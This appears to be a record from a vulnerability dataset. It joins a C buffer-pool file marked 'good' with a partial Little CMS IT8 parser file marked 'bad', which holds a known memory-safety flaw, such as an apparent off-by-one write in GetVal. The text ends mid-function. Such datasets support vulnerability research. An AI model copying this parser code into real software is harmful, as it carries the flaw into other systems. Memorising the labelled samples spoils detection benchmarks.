# include <string.h>
# include "nw_buf.h"
# define NW_BUF_POOL_INIT_SIZE 64
# define NW_BUF_POOL_MAX_SIZE 65535
# define NW_CACHE_INIT_SIZE 64
# define NW_CACHE_MAX_SIZE 65535
size_t nw_buf_size(nw_buf *buf)
{
return buf->wpos - buf->rpos;
}
size_t nw_buf_avail(nw_buf *buf)
{
return buf->size - buf->wpos;
}
size_t nw_buf_write(nw_buf *buf, const void *data, size_t len)
{
size_t available = buf->size - buf->wpos;
size_t wlen = len > available ? available : len;
memcpy(buf->data + buf->wpos, data, wlen);
buf->wpos += wlen;
return wlen;
}
void nw_buf_shift(nw_buf *buf)
{
if (buf->rpos == buf->wpos) {
buf->rpos = buf->wpos = 0;
} else if (buf->rpos != 0) {
memmove(buf->data, buf->data + buf->rpos, buf->wpos - buf->rpos);
buf->wpos -= buf->rpos;
buf->rpos = 0;
}
}
nw_buf_pool *nw_buf_pool_create(uint32_t size)
{
nw_buf_pool *pool = malloc(sizeof(nw_buf_pool));
if (pool == NULL)
return NULL;
pool->size = size;
pool->used = 0;
pool->free = 0;
pool->free_total = NW_BUF_POOL_INIT_SIZE;
pool->free_arr = malloc(pool->free_total * sizeof(nw_buf *));
if (pool->free_arr == NULL) {
free(pool);
return NULL;
}
return pool;
}
nw_buf *nw_buf_alloc(nw_buf_pool *pool)
{
if (pool->free) {
nw_buf *buf = pool->free_arr[--pool->free];
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
nw_buf *buf = malloc(sizeof(nw_buf) + pool->size);
if (buf == NULL)
return NULL;
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
void nw_buf_free(nw_buf_pool *pool, nw_buf *buf)
{
if (pool->free < pool->free_total) {
pool->free_arr[pool->free++] = buf;
} else if (pool->free_total < NW_BUF_POOL_MAX_SIZE) {
uint32_t new_free_total = pool->free_total * 2;
void *new_arr = realloc(pool->free_arr, new_free_total * sizeof(nw_buf *));
if (new_arr) {
pool->free_total = new_free_total;
pool->free_arr = new_arr;
pool->free_arr[pool->free++] = buf;
} else {
free(buf);
}
} else {
free(buf);
}
}
void nw_buf_pool_release(nw_buf_pool *pool)
{
for (uint32_t i = 0; i < pool->free; ++i) {
free(pool->free_arr[i]);
}
free(pool->free_arr);
free(pool);
}
nw_buf_list *nw_buf_list_create(nw_buf_pool *pool, uint32_t limit)
{
nw_buf_list *list = malloc(sizeof(nw_buf_list));
if (list == NULL)
return NULL;
list->pool = pool;
list->count = 0;
list->limit = limit;
list->head = NULL;
list->tail = NULL;
return list;
}
size_t nw_buf_list_write(nw_buf_list *list, const void *data, size_t len)
{
const void *pos = data;
size_t left = len;
if (list->tail && nw_buf_avail(list->tail)) {
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
while (left) {
if (list->limit && list->count >= list->limit)
return len - left;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return len - left;
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
return len;
}
size_t nw_buf_list_append(nw_buf_list *list, const void *data, size_t len)
{
if (list->limit && list->count >= list->limit)
return 0;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return 0;
if (len > buf->size) {
nw_buf_free(list->pool, buf);
return 0;
}
nw_buf_write(buf, data, len);
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
return len;
}
void nw_buf_list_shift(nw_buf_list *list)
{
if (list->head) {
nw_buf *tmp = list->head;
list->head = tmp->next;
if (list->head == NULL) {
list->tail = NULL;
}
list->count--;
nw_buf_free(list->pool, tmp);
}
}
void nw_buf_list_release(nw_buf_list *list)
{
nw_buf *curr = list->head;
nw_buf *next = NULL;
while (curr) {
next = curr->next;
nw_buf_free(list->pool, curr);
curr = next;
}
free(list);
}
nw_cache *nw_cache_create(uint32_t size)
{
nw_cache *cache = malloc(sizeof(nw_cache));
if (cache == NULL)
return NULL;
cache->size = size;
cache->used = 0;
cache->free = 0;
cache->free_total = NW_CACHE_INIT_SIZE;
cache->free_arr = malloc(cache->free_total * sizeof(void *));
if (cache->free_arr == NULL) {
free(cache);
return NULL;
}
return cache;
}
void *nw_cache_alloc(nw_cache *cache)
{
if (cache->free)
return cache->free_arr[--cache->free];
return malloc(cache->size);
}
void nw_cache_free(nw_cache *cache, void *obj)
{
if (cache->free < cache->free_total) {
cache->free_arr[cache->free++] = obj;
} else if (cache->free_total < NW_CACHE_MAX_SIZE) {
uint32_t new_free_total = cache->free_total * 2;
void *new_arr = realloc(cache->free_arr, new_free_total * sizeof(void *));
if (new_arr) {
cache->free_total = new_free_total;
cache->free_arr = new_arr;
cache->free_arr[cache->free++] = obj;
} else {
free(obj);
}
} else {
free(obj);
}
}
void nw_cache_release(nw_cache *cache)
{
for (uint32_t i = 0; i < cache->free; ++i) {
free(cache->free_arr[i]);
}
free(cache->free_arr);
free(cache);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_401_0 |
crossvul-cpp_data_bad_352_9 | //---------------------------------------------------------------------------------
//
// Little Color Management System
// Copyright (c) 1998-2017 Marti Maria Saguer
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the Software
// is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
// THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
//---------------------------------------------------------------------------------
//
#include "lcms2_internal.h"
// IT8.7 / CGATS.17-200x handling -----------------------------------------------------------------------------
#define MAXID 128 // Max length of identifier
#define MAXSTR 1024 // Max length of string
#define MAXTABLES 255 // Max Number of tables in a single stream
#define MAXINCLUDE 20 // Max number of nested includes
#define DEFAULT_DBL_FORMAT "%.10g" // Double formatting
#ifdef CMS_IS_WINDOWS_
# include <io.h>
# define DIR_CHAR '\\'
#else
# define DIR_CHAR '/'
#endif
// Symbols
typedef enum {
SUNDEFINED,
SINUM, // Integer
SDNUM, // Real
SIDENT, // Identifier
SSTRING, // string
SCOMMENT, // comment
SEOLN, // End of line
SEOF, // End of stream
SSYNERROR, // Syntax error found on stream
// Keywords
SBEGIN_DATA,
SBEGIN_DATA_FORMAT,
SEND_DATA,
SEND_DATA_FORMAT,
SKEYWORD,
SDATA_FORMAT_ID,
SINCLUDE
} SYMBOL;
// How to write the value
typedef enum {
WRITE_UNCOOKED,
WRITE_STRINGIFY,
WRITE_HEXADECIMAL,
WRITE_BINARY,
WRITE_PAIR
} WRITEMODE;
// Linked list of variable names
typedef struct _KeyVal {
struct _KeyVal* Next;
char* Keyword; // Name of variable
struct _KeyVal* NextSubkey; // If key is a dictionary, points to the next item
char* Subkey; // If key is a dictionary, points to the subkey name
char* Value; // Points to value
WRITEMODE WriteAs; // How to write the value
} KEYVALUE;
// Linked list of memory chunks (Memory sink)
typedef struct _OwnedMem {
struct _OwnedMem* Next;
void * Ptr; // Point to value
} OWNEDMEM;
// Suballocator
typedef struct _SubAllocator {
cmsUInt8Number* Block;
cmsUInt32Number BlockSize;
cmsUInt32Number Used;
} SUBALLOCATOR;
// Table. Each individual table can hold properties and rows & cols
typedef struct _Table {
char SheetType[MAXSTR]; // The first row of the IT8 (the type)
int nSamples, nPatches; // Cols, Rows
int SampleID; // Pos of ID
KEYVALUE* HeaderList; // The properties
char** DataFormat; // The binary stream descriptor
char** Data; // The binary stream
} TABLE;
// File stream being parsed
typedef struct _FileContext {
char FileName[cmsMAX_PATH]; // File name if being read from file
FILE* Stream; // File stream or NULL if holded in memory
} FILECTX;
// This struct hold all information about an open IT8 handler.
typedef struct {
cmsUInt32Number TablesCount; // How many tables in this stream
cmsUInt32Number nTable; // The actual table
TABLE Tab[MAXTABLES];
// Memory management
OWNEDMEM* MemorySink; // The storage backend
SUBALLOCATOR Allocator; // String suballocator -- just to keep it fast
// Parser state machine
SYMBOL sy; // Current symbol
int ch; // Current character
cmsInt32Number inum; // integer value
cmsFloat64Number dnum; // real value
char id[MAXID]; // identifier
char str[MAXSTR]; // string
// Allowed keywords & datasets. They have visibility on whole stream
KEYVALUE* ValidKeywords;
KEYVALUE* ValidSampleID;
char* Source; // Points to loc. being parsed
cmsInt32Number lineno; // line counter for error reporting
FILECTX* FileStack[MAXINCLUDE]; // Stack of files being parsed
cmsInt32Number IncludeSP; // Include Stack Pointer
char* MemoryBlock; // The stream if holded in memory
char DoubleFormatter[MAXID];// Printf-like 'cmsFloat64Number' formatter
cmsContext ContextID; // The threading context
} cmsIT8;
// The stream for save operations
typedef struct {
FILE* stream; // For save-to-file behaviour
cmsUInt8Number* Base;
cmsUInt8Number* Ptr; // For save-to-mem behaviour
cmsUInt32Number Used;
cmsUInt32Number Max;
} SAVESTREAM;
// ------------------------------------------------------ cmsIT8 parsing routines
// A keyword
typedef struct {
const char *id;
SYMBOL sy;
} KEYWORD;
// The keyword->symbol translation table. Sorting is required.
static const KEYWORD TabKeys[] = {
{"$INCLUDE", SINCLUDE}, // This is an extension!
{".INCLUDE", SINCLUDE}, // This is an extension!
{"BEGIN_DATA", SBEGIN_DATA },
{"BEGIN_DATA_FORMAT", SBEGIN_DATA_FORMAT },
{"DATA_FORMAT_IDENTIFIER", SDATA_FORMAT_ID},
{"END_DATA", SEND_DATA},
{"END_DATA_FORMAT", SEND_DATA_FORMAT},
{"KEYWORD", SKEYWORD}
};
#define NUMKEYS (sizeof(TabKeys)/sizeof(KEYWORD))
// Predefined properties
// A property
typedef struct {
const char *id; // The identifier
WRITEMODE as; // How is supposed to be written
} PROPERTY;
static PROPERTY PredefinedProperties[] = {
{"NUMBER_OF_FIELDS", WRITE_UNCOOKED}, // Required - NUMBER OF FIELDS
{"NUMBER_OF_SETS", WRITE_UNCOOKED}, // Required - NUMBER OF SETS
{"ORIGINATOR", WRITE_STRINGIFY}, // Required - Identifies the specific system, organization or individual that created the data file.
{"FILE_DESCRIPTOR", WRITE_STRINGIFY}, // Required - Describes the purpose or contents of the data file.
{"CREATED", WRITE_STRINGIFY}, // Required - Indicates date of creation of the data file.
{"DESCRIPTOR", WRITE_STRINGIFY}, // Required - Describes the purpose or contents of the data file.
{"DIFFUSE_GEOMETRY", WRITE_STRINGIFY}, // The diffuse geometry used. Allowed values are "sphere" or "opal".
{"MANUFACTURER", WRITE_STRINGIFY},
{"MANUFACTURE", WRITE_STRINGIFY}, // Some broken Fuji targets does store this value
{"PROD_DATE", WRITE_STRINGIFY}, // Identifies year and month of production of the target in the form yyyy:mm.
{"SERIAL", WRITE_STRINGIFY}, // Uniquely identifies individual physical target.
{"MATERIAL", WRITE_STRINGIFY}, // Identifies the material on which the target was produced using a code
// uniquely identifying th e material. This is intend ed to be used for IT8.7
// physical targets only (i.e . IT8.7/1 a nd IT8.7/2).
{"INSTRUMENTATION", WRITE_STRINGIFY}, // Used to report the specific instrumentation used (manufacturer and
// model number) to generate the data reported. This data will often
// provide more information about the particular data collected than an
// extensive list of specific details. This is particularly important for
// spectral data or data derived from spectrophotometry.
{"MEASUREMENT_SOURCE", WRITE_STRINGIFY}, // Illumination used for spectral measurements. This data helps provide
// a guide to the potential for issues of paper fluorescence, etc.
{"PRINT_CONDITIONS", WRITE_STRINGIFY}, // Used to define the characteristics of the printed sheet being reported.
// Where standard conditions have been defined (e.g., SWOP at nominal)
// named conditions may suffice. Otherwise, detailed information is
// needed.
{"SAMPLE_BACKING", WRITE_STRINGIFY}, // Identifies the backing material used behind the sample during
// measurement. Allowed values are "black", "white", or {"na".
{"CHISQ_DOF", WRITE_STRINGIFY}, // Degrees of freedom associated with the Chi squared statistic
// below properties are new in recent specs:
{"MEASUREMENT_GEOMETRY", WRITE_STRINGIFY}, // The type of measurement, either reflection or transmission, should be indicated
// along with details of the geometry and the aperture size and shape. For example,
// for transmission measurements it is important to identify 0/diffuse, diffuse/0,
// opal or integrating sphere, etc. For reflection it is important to identify 0/45,
// 45/0, sphere (specular included or excluded), etc.
{"FILTER", WRITE_STRINGIFY}, // Identifies the use of physical filter(s) during measurement. Typically used to
// denote the use of filters such as none, D65, Red, Green or Blue.
{"POLARIZATION", WRITE_STRINGIFY}, // Identifies the use of a physical polarization filter during measurement. Allowed
// values are {"yes", "white", "none" or "na".
{"WEIGHTING_FUNCTION", WRITE_PAIR}, // Indicates such functions as: the CIE standard observer functions used in the
// calculation of various data parameters (2 degree and 10 degree), CIE standard
// illuminant functions used in the calculation of various data parameters (e.g., D50,
// D65, etc.), density status response, etc. If used there shall be at least one
// name-value pair following the WEIGHTING_FUNCTION tag/keyword. The first attribute
// in the set shall be {"name" and shall identify the particular parameter used.
// The second shall be {"value" and shall provide the value associated with that name.
// For ASCII data, a string containing the Name and Value attribute pairs shall follow
// the weighting function keyword. A semi-colon separates attribute pairs from each
// other and within the attribute the name and value are separated by a comma.
{"COMPUTATIONAL_PARAMETER", WRITE_PAIR}, // Parameter that is used in computing a value from measured data. Name is the name
// of the calculation, parameter is the name of the parameter used in the calculation
// and value is the value of the parameter.
{"TARGET_TYPE", WRITE_STRINGIFY}, // The type of target being measured, e.g. IT8.7/1, IT8.7/3, user defined, etc.
{"COLORANT", WRITE_STRINGIFY}, // Identifies the colorant(s) used in creating the target.
{"TABLE_DESCRIPTOR", WRITE_STRINGIFY}, // Describes the purpose or contents of a data table.
{"TABLE_NAME", WRITE_STRINGIFY} // Provides a short name for a data table.
};
#define NUMPREDEFINEDPROPS (sizeof(PredefinedProperties)/sizeof(PROPERTY))
// Predefined sample types on dataset
static const char* PredefinedSampleID[] = {
"SAMPLE_ID", // Identifies sample that data represents
"STRING", // Identifies label, or other non-machine readable value.
// Value must begin and end with a " symbol
"CMYK_C", // Cyan component of CMYK data expressed as a percentage
"CMYK_M", // Magenta component of CMYK data expressed as a percentage
"CMYK_Y", // Yellow component of CMYK data expressed as a percentage
"CMYK_K", // Black component of CMYK data expressed as a percentage
"D_RED", // Red filter density
"D_GREEN", // Green filter density
"D_BLUE", // Blue filter density
"D_VIS", // Visual filter density
"D_MAJOR_FILTER", // Major filter d ensity
"RGB_R", // Red component of RGB data
"RGB_G", // Green component of RGB data
"RGB_B", // Blue com ponent of RGB data
"SPECTRAL_NM", // Wavelength of measurement expressed in nanometers
"SPECTRAL_PCT", // Percentage reflectance/transmittance
"SPECTRAL_DEC", // Reflectance/transmittance
"XYZ_X", // X component of tristimulus data
"XYZ_Y", // Y component of tristimulus data
"XYZ_Z", // Z component of tristimulus data
"XYY_X", // x component of chromaticity data
"XYY_Y", // y component of chromaticity data
"XYY_CAPY", // Y component of tristimulus data
"LAB_L", // L* component of Lab data
"LAB_A", // a* component of Lab data
"LAB_B", // b* component of Lab data
"LAB_C", // C*ab component of Lab data
"LAB_H", // hab component of Lab data
"LAB_DE", // CIE dE
"LAB_DE_94", // CIE dE using CIE 94
"LAB_DE_CMC", // dE using CMC
"LAB_DE_2000", // CIE dE using CIE DE 2000
"MEAN_DE", // Mean Delta E (LAB_DE) of samples compared to batch average
// (Used for data files for ANSI IT8.7/1 and IT8.7/2 targets)
"STDEV_X", // Standard deviation of X (tristimulus data)
"STDEV_Y", // Standard deviation of Y (tristimulus data)
"STDEV_Z", // Standard deviation of Z (tristimulus data)
"STDEV_L", // Standard deviation of L*
"STDEV_A", // Standard deviation of a*
"STDEV_B", // Standard deviation of b*
"STDEV_DE", // Standard deviation of CIE dE
"CHI_SQD_PAR"}; // The average of the standard deviations of L*, a* and b*. It is
// used to derive an estimate of the chi-squared parameter which is
// recommended as the predictor of the variability of dE
#define NUMPREDEFINEDSAMPLEID (sizeof(PredefinedSampleID)/sizeof(char *))
//Forward declaration of some internal functions
static void* AllocChunk(cmsIT8* it8, cmsUInt32Number size);
// Checks whatever c is a separator
static
cmsBool isseparator(int c)
{
return (c == ' ') || (c == '\t') ;
}
// Checks whatever c is a valid identifier char
static
cmsBool ismiddle(int c)
{
return (!isseparator(c) && (c != '#') && (c !='\"') && (c != '\'') && (c > 32) && (c < 127));
}
// Checks whatsever c is a valid identifier middle char.
static
cmsBool isidchar(int c)
{
return isalnum(c) || ismiddle(c);
}
// Checks whatsever c is a valid identifier first char.
static
cmsBool isfirstidchar(int c)
{
return !isdigit(c) && ismiddle(c);
}
// Guess whether the supplied path looks like an absolute path
static
cmsBool isabsolutepath(const char *path)
{
char ThreeChars[4];
if(path == NULL)
return FALSE;
if (path[0] == 0)
return FALSE;
strncpy(ThreeChars, path, 3);
ThreeChars[3] = 0;
if(ThreeChars[0] == DIR_CHAR)
return TRUE;
#ifdef CMS_IS_WINDOWS_
if (isalpha((int) ThreeChars[0]) && ThreeChars[1] == ':')
return TRUE;
#endif
return FALSE;
}
// Makes a file path based on a given reference path
// NOTE: this function doesn't check if the path exists or even if it's legal
static
cmsBool BuildAbsolutePath(const char *relPath, const char *basePath, char *buffer, cmsUInt32Number MaxLen)
{
char *tail;
cmsUInt32Number len;
// Already absolute?
if (isabsolutepath(relPath)) {
strncpy(buffer, relPath, MaxLen);
buffer[MaxLen-1] = 0;
return TRUE;
}
// No, search for last
strncpy(buffer, basePath, MaxLen);
buffer[MaxLen-1] = 0;
tail = strrchr(buffer, DIR_CHAR);
if (tail == NULL) return FALSE; // Is not absolute and has no separators??
len = (cmsUInt32Number) (tail - buffer);
if (len >= MaxLen) return FALSE;
// No need to assure zero terminator over here
strncpy(tail + 1, relPath, MaxLen - len);
return TRUE;
}
// Make sure no exploit is being even tried
static
const char* NoMeta(const char* str)
{
if (strchr(str, '%') != NULL)
return "**** CORRUPTED FORMAT STRING ***";
return str;
}
// Syntax error
static
cmsBool SynError(cmsIT8* it8, const char *Txt, ...)
{
char Buffer[256], ErrMsg[1024];
va_list args;
va_start(args, Txt);
vsnprintf(Buffer, 255, Txt, args);
Buffer[255] = 0;
va_end(args);
snprintf(ErrMsg, 1023, "%s: Line %d, %s", it8->FileStack[it8 ->IncludeSP]->FileName, it8->lineno, Buffer);
ErrMsg[1023] = 0;
it8->sy = SSYNERROR;
cmsSignalError(it8 ->ContextID, cmsERROR_CORRUPTION_DETECTED, "%s", ErrMsg);
return FALSE;
}
// Check if current symbol is same as specified. issue an error else.
static
cmsBool Check(cmsIT8* it8, SYMBOL sy, const char* Err)
{
if (it8 -> sy != sy)
return SynError(it8, NoMeta(Err));
return TRUE;
}
// Read Next character from stream
static
void NextCh(cmsIT8* it8)
{
if (it8 -> FileStack[it8 ->IncludeSP]->Stream) {
it8 ->ch = fgetc(it8 ->FileStack[it8 ->IncludeSP]->Stream);
if (feof(it8 -> FileStack[it8 ->IncludeSP]->Stream)) {
if (it8 ->IncludeSP > 0) {
fclose(it8 ->FileStack[it8->IncludeSP--]->Stream);
it8 -> ch = ' '; // Whitespace to be ignored
} else
it8 ->ch = 0; // EOF
}
}
else {
it8->ch = *it8->Source;
if (it8->ch) it8->Source++;
}
}
// Try to see if current identifier is a keyword, if so return the referred symbol
static
SYMBOL BinSrchKey(const char *id)
{
int l = 1;
int r = NUMKEYS;
int x, res;
while (r >= l)
{
x = (l+r)/2;
res = cmsstrcasecmp(id, TabKeys[x-1].id);
if (res == 0) return TabKeys[x-1].sy;
if (res < 0) r = x - 1;
else l = x + 1;
}
return SUNDEFINED;
}
// 10 ^n
static
cmsFloat64Number xpow10(int n)
{
return pow(10, (cmsFloat64Number) n);
}
// Reads a Real number, tries to follow from integer number
static
void ReadReal(cmsIT8* it8, cmsInt32Number inum)
{
it8->dnum = (cmsFloat64Number)inum;
while (isdigit(it8->ch)) {
it8->dnum = (cmsFloat64Number)it8->dnum * 10.0 + (cmsFloat64Number)(it8->ch - '0');
NextCh(it8);
}
if (it8->ch == '.') { // Decimal point
cmsFloat64Number frac = 0.0; // fraction
int prec = 0; // precision
NextCh(it8); // Eats dec. point
while (isdigit(it8->ch)) {
frac = frac * 10.0 + (cmsFloat64Number)(it8->ch - '0');
prec++;
NextCh(it8);
}
it8->dnum = it8->dnum + (frac / xpow10(prec));
}
// Exponent, example 34.00E+20
if (toupper(it8->ch) == 'E') {
cmsInt32Number e;
cmsInt32Number sgn;
NextCh(it8); sgn = 1;
if (it8->ch == '-') {
sgn = -1; NextCh(it8);
}
else
if (it8->ch == '+') {
sgn = +1;
NextCh(it8);
}
e = 0;
while (isdigit(it8->ch)) {
cmsInt32Number digit = (it8->ch - '0');
if ((cmsFloat64Number)e * 10.0 + (cmsFloat64Number)digit < (cmsFloat64Number)+2147483647.0)
e = e * 10 + digit;
NextCh(it8);
}
e = sgn*e;
it8->dnum = it8->dnum * xpow10(e);
}
}
// Parses a float number
// This can not call directly atof because it uses locale dependent
// parsing, while CCMX files always use . as decimal separator
static
cmsFloat64Number ParseFloatNumber(const char *Buffer)
{
cmsFloat64Number dnum = 0.0;
int sign = 1;
// keep safe
if (Buffer == NULL) return 0.0;
if (*Buffer == '-' || *Buffer == '+') {
sign = (*Buffer == '-') ? -1 : 1;
Buffer++;
}
while (*Buffer && isdigit((int)*Buffer)) {
dnum = dnum * 10.0 + (*Buffer - '0');
if (*Buffer) Buffer++;
}
if (*Buffer == '.') {
cmsFloat64Number frac = 0.0; // fraction
int prec = 0; // precision
if (*Buffer) Buffer++;
while (*Buffer && isdigit((int)*Buffer)) {
frac = frac * 10.0 + (*Buffer - '0');
prec++;
if (*Buffer) Buffer++;
}
dnum = dnum + (frac / xpow10(prec));
}
// Exponent, example 34.00E+20
if (*Buffer && toupper(*Buffer) == 'E') {
int e;
int sgn;
if (*Buffer) Buffer++;
sgn = 1;
if (*Buffer == '-') {
sgn = -1;
if (*Buffer) Buffer++;
}
else
if (*Buffer == '+') {
sgn = +1;
if (*Buffer) Buffer++;
}
e = 0;
while (*Buffer && isdigit((int)*Buffer)) {
cmsInt32Number digit = (*Buffer - '0');
if ((cmsFloat64Number)e * 10.0 + digit < (cmsFloat64Number)+2147483647.0)
e = e * 10 + digit;
if (*Buffer) Buffer++;
}
e = sgn*e;
dnum = dnum * xpow10(e);
}
return sign * dnum;
}
// Reads next symbol
static
void InSymbol(cmsIT8* it8)
{
register char *idptr;
register int k;
SYMBOL key;
int sng;
do {
while (isseparator(it8->ch))
NextCh(it8);
if (isfirstidchar(it8->ch)) { // Identifier
k = 0;
idptr = it8->id;
do {
if (++k < MAXID) *idptr++ = (char) it8->ch;
NextCh(it8);
} while (isidchar(it8->ch));
*idptr = '\0';
key = BinSrchKey(it8->id);
if (key == SUNDEFINED) it8->sy = SIDENT;
else it8->sy = key;
}
else // Is a number?
if (isdigit(it8->ch) || it8->ch == '.' || it8->ch == '-' || it8->ch == '+')
{
int sign = 1;
if (it8->ch == '-') {
sign = -1;
NextCh(it8);
}
it8->inum = 0;
it8->sy = SINUM;
if (it8->ch == '0') { // 0xnnnn (Hexa) or 0bnnnn (Binary)
NextCh(it8);
if (toupper(it8->ch) == 'X') {
int j;
NextCh(it8);
while (isxdigit(it8->ch))
{
it8->ch = toupper(it8->ch);
if (it8->ch >= 'A' && it8->ch <= 'F') j = it8->ch -'A'+10;
else j = it8->ch - '0';
if ((cmsFloat64Number) it8->inum * 16.0 + (cmsFloat64Number) j > (cmsFloat64Number)+2147483647.0)
{
SynError(it8, "Invalid hexadecimal number");
return;
}
it8->inum = it8->inum * 16 + j;
NextCh(it8);
}
return;
}
if (toupper(it8->ch) == 'B') { // Binary
int j;
NextCh(it8);
while (it8->ch == '0' || it8->ch == '1')
{
j = it8->ch - '0';
if ((cmsFloat64Number) it8->inum * 2.0 + j > (cmsFloat64Number)+2147483647.0)
{
SynError(it8, "Invalid binary number");
return;
}
it8->inum = it8->inum * 2 + j;
NextCh(it8);
}
return;
}
}
while (isdigit(it8->ch)) {
cmsInt32Number digit = (it8->ch - '0');
if ((cmsFloat64Number) it8->inum * 10.0 + (cmsFloat64Number) digit > (cmsFloat64Number) +2147483647.0) {
ReadReal(it8, it8->inum);
it8->sy = SDNUM;
it8->dnum *= sign;
return;
}
it8->inum = it8->inum * 10 + digit;
NextCh(it8);
}
if (it8->ch == '.') {
ReadReal(it8, it8->inum);
it8->sy = SDNUM;
it8->dnum *= sign;
return;
}
it8 -> inum *= sign;
// Special case. Numbers followed by letters are taken as identifiers
if (isidchar(it8 ->ch)) {
if (it8 ->sy == SINUM) {
snprintf(it8->id, 127, "%d", it8->inum);
}
else {
snprintf(it8->id, 127, it8 ->DoubleFormatter, it8->dnum);
}
k = (int) strlen(it8 ->id);
idptr = it8 ->id + k;
do {
if (++k < MAXID) *idptr++ = (char) it8->ch;
NextCh(it8);
} while (isidchar(it8->ch));
*idptr = '\0';
it8->sy = SIDENT;
}
return;
}
else
switch ((int) it8->ch) {
// EOF marker -- ignore it
case '\x1a':
NextCh(it8);
break;
// Eof stream markers
case 0:
case -1:
it8->sy = SEOF;
break;
// Next line
case '\r':
NextCh(it8);
if (it8 ->ch == '\n')
NextCh(it8);
it8->sy = SEOLN;
it8->lineno++;
break;
case '\n':
NextCh(it8);
it8->sy = SEOLN;
it8->lineno++;
break;
// Comment
case '#':
NextCh(it8);
while (it8->ch && it8->ch != '\n' && it8->ch != '\r')
NextCh(it8);
it8->sy = SCOMMENT;
break;
// String.
case '\'':
case '\"':
idptr = it8->str;
sng = it8->ch;
k = 0;
NextCh(it8);
while (k < (MAXSTR-1) && it8->ch != sng) {
if (it8->ch == '\n'|| it8->ch == '\r') k = MAXSTR+1;
else {
*idptr++ = (char) it8->ch;
NextCh(it8);
k++;
}
}
it8->sy = SSTRING;
*idptr = '\0';
NextCh(it8);
break;
default:
SynError(it8, "Unrecognized character: 0x%x", it8 ->ch);
return;
}
} while (it8->sy == SCOMMENT);
// Handle the include special token
if (it8 -> sy == SINCLUDE) {
FILECTX* FileNest;
if(it8 -> IncludeSP >= (MAXINCLUDE-1)) {
SynError(it8, "Too many recursion levels");
return;
}
InSymbol(it8);
if (!Check(it8, SSTRING, "Filename expected")) return;
FileNest = it8 -> FileStack[it8 -> IncludeSP + 1];
if(FileNest == NULL) {
FileNest = it8 ->FileStack[it8 -> IncludeSP + 1] = (FILECTX*)AllocChunk(it8, sizeof(FILECTX));
//if(FileNest == NULL)
// TODO: how to manage out-of-memory conditions?
}
if (BuildAbsolutePath(it8->str,
it8->FileStack[it8->IncludeSP]->FileName,
FileNest->FileName, cmsMAX_PATH-1) == FALSE) {
SynError(it8, "File path too long");
return;
}
FileNest->Stream = fopen(FileNest->FileName, "rt");
if (FileNest->Stream == NULL) {
SynError(it8, "File %s not found", FileNest->FileName);
return;
}
it8->IncludeSP++;
it8 ->ch = ' ';
InSymbol(it8);
}
}
// Checks end of line separator
static
cmsBool CheckEOLN(cmsIT8* it8)
{
if (!Check(it8, SEOLN, "Expected separator")) return FALSE;
while (it8 -> sy == SEOLN)
InSymbol(it8);
return TRUE;
}
// Skip a symbol
static
void Skip(cmsIT8* it8, SYMBOL sy)
{
if (it8->sy == sy && it8->sy != SEOF)
InSymbol(it8);
}
// Skip multiple EOLN
static
void SkipEOLN(cmsIT8* it8)
{
while (it8->sy == SEOLN) {
InSymbol(it8);
}
}
// Returns a string holding current value
static
cmsBool GetVal(cmsIT8* it8, char* Buffer, cmsUInt32Number max, const char* ErrorTitle)
{
switch (it8->sy) {
case SEOLN: // Empty value
Buffer[0]=0;
break;
case SIDENT: strncpy(Buffer, it8->id, max);
Buffer[max-1]=0;
break;
case SINUM: snprintf(Buffer, max, "%d", it8 -> inum); break;
case SDNUM: snprintf(Buffer, max, it8->DoubleFormatter, it8 -> dnum); break;
case SSTRING: strncpy(Buffer, it8->str, max);
Buffer[max-1] = 0;
break;
default:
return SynError(it8, "%s", ErrorTitle);
}
Buffer[max] = 0;
return TRUE;
}
// ---------------------------------------------------------- Table
static
TABLE* GetTable(cmsIT8* it8)
{
if ((it8 -> nTable >= it8 ->TablesCount)) {
SynError(it8, "Table %d out of sequence", it8 -> nTable);
return it8 -> Tab;
}
return it8 ->Tab + it8 ->nTable;
}
// ---------------------------------------------------------- Memory management
// Frees an allocator and owned memory
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (it8 == NULL)
return;
if (it8->MemorySink) {
OWNEDMEM* p;
OWNEDMEM* n;
for (p = it8->MemorySink; p != NULL; p = n) {
n = p->Next;
if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr);
_cmsFree(it8 ->ContextID, p);
}
}
if (it8->MemoryBlock)
_cmsFree(it8 ->ContextID, it8->MemoryBlock);
_cmsFree(it8 ->ContextID, it8);
}
// Allocates a chunk of data, keep linked list
static
void* AllocBigBlock(cmsIT8* it8, cmsUInt32Number size)
{
OWNEDMEM* ptr1;
void* ptr = _cmsMallocZero(it8->ContextID, size);
if (ptr != NULL) {
ptr1 = (OWNEDMEM*) _cmsMallocZero(it8 ->ContextID, sizeof(OWNEDMEM));
if (ptr1 == NULL) {
_cmsFree(it8 ->ContextID, ptr);
